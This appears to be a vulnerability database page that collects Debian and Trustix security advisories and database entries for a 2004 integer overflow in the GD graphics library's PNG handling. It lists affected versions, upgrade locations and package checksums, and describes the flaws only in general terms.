    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_powerpc.deb
      Size/MD5 checksum:   107162 0247901b207dde950db5cf6f64b74f09
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_powerpc.deb
      Size/MD5 checksum:   106626 b8a6de56f1eb995717615ff245e791af

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_s390.deb
      Size/MD5 checksum:   122748 20c39c114c631325e077c57fd6211aa5
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_s390.deb
      Size/MD5 checksum:   122184 c9108d0471bb1825159cc5f8a58496d0
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_s390.deb
      Size/MD5 checksum:   106588 82ba4f2b04e549deb0f22834ea5cc452
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_s390.deb
      Size/MD5 checksum:   105890 da80b129742d8b427e52f6ee0afa8594

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_sparc.deb
      Size/MD5 checksum:   123594 b230f7aa1beaa534f411e1de18e847e0
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_sparc.deb
      Size/MD5 checksum:   123086 a68b2ff47c4801bf409027915ffa085c
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_sparc.deb
      Size/MD5 checksum:   105088 32eb04da2010c77616faacfd7737cc33
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_sparc.deb
      Size/MD5 checksum:   104800 7a78072a008f89d561222ea29695f7af


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBqzL8W5ql+IAeqTIRAt4iAJ4xVv0L/nmb9CQutRz2IbqWnN+95gCgnQqL
ZxBI7+gG94Vlvh9OQH60c9c=
=Y0PO
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
    

- 漏洞信息 (F35080)

Trustix Secure Linux Security Advisory 2004.58 (PacketStormID:F35080)
2004-11-20 00:00:00
 
advisory
linux
CVE-2004-0941,CVE-2004-0990,CVE-2004-0882,CVE-2004-0930
[点击下载]

Trustix Secure Linux Security Advisory #2004-0058 - Various security fixes have been released for gd, samba, sqlgrey, and sudo.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2004-0058

Package name:      gd samba sqlgrey sudo
Summary:           Various security fixes
Date:              2004-11-15
Affected versions: Trustix Secure Linux 1.5
                   Trustix Secure Linux 2.0
                   Trustix Secure Linux 2.1
                   Trustix Secure Linux 2.2
                   Trustix Operating System - Enterprise Server 2

- --------------------------------------------------------------------------
Package description:
  gd:
  gd is a graphics library. It allows your code to quickly draw images
  complete with lines, arcs, text, multiple colors, cut and paste from
  other images, and flood fills, and write out the result as a PNG or
  JPEG file. This is particularly useful in World Wide Web applications,
  where PNG and JPEG are two of the formats accepted for inline images
  by most browsers.

  samba:
  Samba provides an SMB server which can be used to provide network
  services to SMB (sometimes called "Lan Manager") clients, including
  various versions of MS Windows, OS/2, and other Linux machines

  sqlgrey:
  SQLgrey is a Postfix grey-listing policy service with auto-white-listing
  written in Perl with SQL database as storage backend.

  sudo:
  Sudo (superuser do) allows a system administrator to give certain
  users (or groups of users) the ability to run some (or all) commands
  as root while logging all commands and arguments. Sudo operates on a
  per-command basis.  It is not a replacement for the shell.  Features
  include: the ability to restrict what commands a user may run on a
  per-host basis, copious logging of each command (providing a clear
  audit trail of who did what), a configurable timeout of the sudo
  command, and the ability to use the same configuration file (sudoers)
  on many different machines.


Problem description:

  gd:
  There has been found serveral overflows in gd.  This can be used to
  execute arbitary code in programs using the gd library.

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0941 and CAN-2004-0990 to these issues.


  sqlgrey:
  Matt Linzbach made us aware that the maintainers of SQLgrey have issued
  a new release that fixes an SQL injection bug.


  samba:
  From the Samba advisory:
  Invalid bounds checking in reply to certain trans2 requests 
  could result in a buffer overrun in smbd.  In order to exploit 
  this defect, the attacker must be able to create files with very 
  specific Unicode filenames on the Samba share. 

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0882 to this issue.

  From the Samba advisory:
  A bug in the input validation routines used to match
  filename strings containing wildcard characters may allow
  a user to consume more than normal amounts of CPU cycles
  thus impacting the performance and response of the server.
  In some circumstances the server can become entirely
  unresponsive.

  The Common Vulnerabilities and Exposures project (cve.mitre.org) has
  assigned the name CAN-2004-0930 to this issue.


  sudo:
  Bash exported functions and the CDPATH variable are now stripped from 
  the environment passed to the program to be executed. 




Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  <URI:http://http.trustix.org/pub/trustix/updates/>
  <URI:ftp://ftp.trustix.org/pub/trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  <URI:http://www.trustix.org/support/>


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  <URI:http://www.trustix.org/TSL-SIGN-KEY>

  The advisory itself is available from the errata pages at
  <URI:http://www.trustix.org/errata/trustix-1.5/>,
  <URI:http://www.trustix.org/errata/trustix-2.0/>,
  <URI:http://www.trustix.org/errata/trustix-2.1/> and
  <URI:http://www.trustix.org/errata/trustix-2.2/>
  or directly at
  <URI:http://www.trustix.org/errata/2004/0058/>


MD5sums of the packages:
- --------------------------------------------------------------------------
a470211caddc2fd447fcfd2c3a009e64  2.2/rpms/gd-2.0.33-3tr.i586.rpm
dbfd11b288d2cedc745eef11b5694caf  2.2/rpms/gd-devel-2.0.33-3tr.i586.rpm
f8382d132037ead78313d0619b2b6c7a  2.2/rpms/gd-utils-2.0.33-3tr.i586.rpm
52c5bcbdd1343ae17a190f4c97044064  2.2/rpms/samba-3.0.7-2tr.i586.rpm
56c45ba7dc304ba6383e28af8894f4f9  2.2/rpms/samba-client-3.0.7-2tr.i586.rpm
cc8b41a2b9186231f5e4561fe2b2771c  2.2/rpms/samba-common-3.0.7-2tr.i586.rpm
8a31afe741dc235de66cd69eaad83c4a  2.2/rpms/samba-mysql-3.0.7-2tr.i586.rpm
106f17d50d8a6840f6256966d05ad5c8  2.2/rpms/sudo-1.6.8p2-1tr.i586.rpm

bf216f045129eb4b38349fb39ca5eb83  2.1/rpms/samba-3.0.7-2tr.i586.rpm
c76fee25117140451d492715a8183417  2.1/rpms/samba-client-3.0.7-2tr.i586.rpm
60bbf8e8e173673440198c1217000c84  2.1/rpms/samba-common-3.0.7-2tr.i586.rpm
0e7e7694e62530ae9d07bd1b9b165cce  2.1/rpms/samba-mysql-3.0.7-2tr.i586.rpm
51091585680beb1ba093a5c223bfb3bc  2.1/rpms/sudo-1.6.8p2-0.2tr.i586.rpm

4b9b2bc6692618d7d0b55a991c274b74  2.0/rpms/sudo-1.6.8p2-0.1tr.i586.rpm
ddbeb2e29e279ffab2d5bb1b4f439d04  1.5/rpms/sudo-1.6.8p2-0.1tr.i586.rpm
- --------------------------------------------------------------------------


Trustix Security Team


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQFBmgzJi8CEzsK9IksRAreXAKCi442/YAm+c9wfhLQmooBuc9Lh0gCeKBC4
TA+rggg0v42NFDY0o+rrlY8=
=omlt
-----END PGP SIGNATURE-----
    

- 漏洞信息

11190
GD Graphics Library PNG Handling gdImageCreateFromPngCtx() Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in GD Graphics Library. GD Graphics Library fails to check for an integer overflow when allocating memory for PNG image files in the gd_png.c gdImageCreateFromPngCtx() function. Using a specially crafted PNG image file, an attacker can cause a heap overflow and as a result remotely execute arbitrary code, leading to a loss of integrity.

- 时间线

2004-10-25 Unknow
2004-10-25 Unknow

- 解决方案

Upgrade to version 2.0.29 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

GD Graphics Library Remote Integer Overflow Vulnerability
Boundary Condition Error 11523
Yes Yes
2004-10-26 12:00:00 2007-03-21 10:44:00
Discovery of this issue is credited to Sean <infamous41md@hotpop.com>.

- 受影响的程序版本

Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
Turbolinux Home
Turbolinux FUJI 0
Turbolinux Appliance Server 2.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Linux 1.5
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
rPath rPath Linux 1
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1
OpenPKG OpenPKG 2.2
OpenPKG OpenPKG 2.1
OpenPKG OpenPKG Current
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
GD Graphics Library gdlib 2.0.28
GD Graphics Library gdlib 2.0.27
GD Graphics Library gdlib 2.0.26
GD Graphics Library gdlib 2.0.23
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
GD Graphics Library gdlib 2.0.22
GD Graphics Library gdlib 2.0.21
GD Graphics Library gdlib 2.0.20
GD Graphics Library gdlib 2.0.15
GD Graphics Library gdlib 2.0.1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
GD Graphics Library gdlib 1.8.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 3
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya Modular Messaging S3400
Avaya MN100
Avaya Intuity LX
Avaya Converged Communications Server 2.0

- 漏洞讨论

The GD Graphics Library (gdlib) is affected by an integer overflow that facilitates a heap overflow. This issue is due to the library's failure to do proper sanity checking on size values contained within image-format files.

An attacker may leverage this issue to manipulate process heap memory, potentially leading to code execution and compromise of the computer running the affected library.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 解决方案

Please see the referenced advisories for more information.

NOTE: Reportedly, the vendor has released a patch or upgrade dealing with this issue, but this is unconfirmed. Please contact the vendor for more information.


GD Graphics Library gdlib 1.8.4

GD Graphics Library gdlib 2.0.1

GD Graphics Library gdlib 2.0.15

GD Graphics Library gdlib 2.0.23

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站